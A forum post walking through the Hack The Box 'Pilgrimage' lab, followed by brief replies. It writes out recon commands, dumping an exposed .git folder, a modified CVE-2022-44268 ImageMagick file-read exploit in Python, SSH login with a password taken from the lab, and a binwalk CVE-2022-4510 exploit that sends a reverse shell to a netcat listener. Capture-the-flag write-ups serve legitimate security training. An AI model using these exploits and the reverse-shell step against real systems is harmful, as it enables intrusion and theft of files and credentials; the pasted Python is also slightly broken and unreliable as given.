Pilgrimage Writeup
by jimmyl08 - Sunday July 2, 2023 at 07:04 AM
#1
This is a full writeup to get all the flags for the Pilgrimage machine the intended way.

https://app.hackthebox.com/machines/549


Scan the ports and add the website url to hosts (we will need it later)

kali@kali: export ip=10.10.11.219 kali@kali: nmap $ip -sV -sC -v kali@kali: sudo bash -c 'echo "10.10.11.219    pilgrimage.htb" >> /etc/hosts'


Scan the target for common files and directories and find the .git folder

kali@kali: wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-medium-files.txt kali@kali: ffuf -u http://$ip/FUZZ -w /tmp/raft-medium-files.txt -r


Dump the .git folder
kali@kali: python3 -m pip install git-dumper kali@kali: git-dumper http://pilgrimage.htb/.git /tmp/git kali@kali: cat /tmp/git/login.php


Notice this line:
$db = new PDO('sqlite:/var/db/pilgrimage');

Among the files we get from the git folder we have the magick binary. The version gives us the exploit we need.
kali@kali: ./magick -version

We get the exploit from here https://sploitus.com/?query=CVE-2022-44268#exploits

Modify the POC like this to download a file instead of printing it to the console:

import argparse import requests import io from PIL import Image, PngImagePlugin def main():     if args.url:         headers = {'User-Agent': 'Shift Security Consulting https://shiftsecurityconsulting.com - CVE-2022-44268'}         response = requests.get(args.url)         img = Image.open(io.BytesIO(response.content))         # Extract the raw profile type from the image metadata         raw_profile_type = img.info.get('Raw profile type', '').split("\n")[3:]         raw_profile_type_stipped = "\n".join(raw_profile_type)         with open('sqlite.db', 'wb') as myFile:             myFile.write(bytes.fromhex(raw_profile_type_stipped))         # Decrypt the raw profile type from hex format         #decrypted_profile_type = bytes.fromhex(raw_profile_type_stipped).decode('utf-8')         # Print the decrypted profile type         print(decrypted_profile_type)         elif args.image:         # Open the image file         img = Image.open(args.image)         # Create a PngInfo object and add the text         info = PngImagePlugin.PngInfo()         info.add_text('profile', args.file_to_read, zip=False)         # Save the modified image to a new file         img.save(args.output, 'PNG', pnginfo=info)     else:         print('Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com\nUse -h for help')     if __name__ == '__main__':     parser = argparse.ArgumentParser(description='Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com')     parser.add_argument('--url', help='The URL of the uploaded PNG image')     parser.add_argument('--image', help='Input PNG file')     parser.add_argument('--file-to-read', help='File to read')     parser.add_argument('--output', help='Output PNG file')     args = parser.parse_args()     if not vars(args):         parser.print_help()     main()


Create the image file with the exploit to upload
kali@kali: python3 CVE-2022-44268.py --image any_image.png --file-to-read /var/db/pilgrimage --output poisoned.png

In the browser, got to http://pilgrimage.htb and upload poisoned.png
Copy the new url that gives you and use it in the command below

kali@kali: python3 CVE-2022-44268.py --url http://pilgrimage.htb/shrunk/21a0iaac1153e.png

You should now have a new file called sqlite.db, read it an get the creds.

kali@kali: sqlitebrowser sqlite.db kali@kali: ssh emily@pilgrimage.htb password: abigchonkyboi123 emily@pilgrimage: cat user.txt


We now have the user flag.

Run linpeas.sh with the new access. (Follow the instructions on the git page)
https://github.com/carlospolop/PEASS-ng/...er/linPEAS

Notice /usr/sbin/malwarescan.sh

emily@pilgrimage: cat /usr/sbin/malwarescan.sh

Notice

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')" binout="$(/usr/local/bin/binwalk -e "$filename")"


We get the exploit for binwalk from https://sploitus.com/?query=CVE-2022-4510#exploits

emily@pilgrimage: python3 binwalk.py [any_image].png 10.10.14.252 1338

Set up a listener on your local machine:

kali@kali: nc -nlvp 1338

Back on the HTB machine, copy the image with the binwalk exploit to the path that we saw in the script above:

emily@pilgrimage: mv /home/emily/binwalk_exploit.png /var/www/pilgrimage.htb/shrunk

Go to the listener in your local machine, you should have root:

# cat /root/root.txt

We now ha the root flag.
#2
this is a good writeup m8 but there is already a thread with the solution and further discussions.
#3
goood!
#4
thanks
#5
Great write up, thanks for sharing
#6
nice writeup
#7
nice work it did really help me keep up <3
Ban reason: Spamming | Contact us via https://raidforums.su/contact if you feel this is incorrect. (Permanent)
#8
nice writeup, keep it up!
#9
woah great
Ban reason: Leeching | https://raidforums.su/Forum-Ban-Appeals if you feel this is incorrect. (Permanent)
#10
goood!!! nice writeup
Ban reason: Leeching. (Permanent)


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 597 91,232 03-27-2026, 10:54 PM
Last Post: w3soul
  JET fortress writeup + flags ssrf 37 19,600 02-08-2026, 11:19 AM
Last Post: textfor
  Cybernetics writeup braun33 0 1,151 01-11-2026, 06:54 PM
Last Post: braun33
  cpts exam writeup trading hacker234324 5 2,298 01-06-2026, 06:02 PM
Last Post: draco17277
  HTB - backfire user+root|video 1080p|writeup tony_boom23 10 1,445 01-05-2026, 05:46 PM
Last Post: Damnitree



 Users browsing this thread: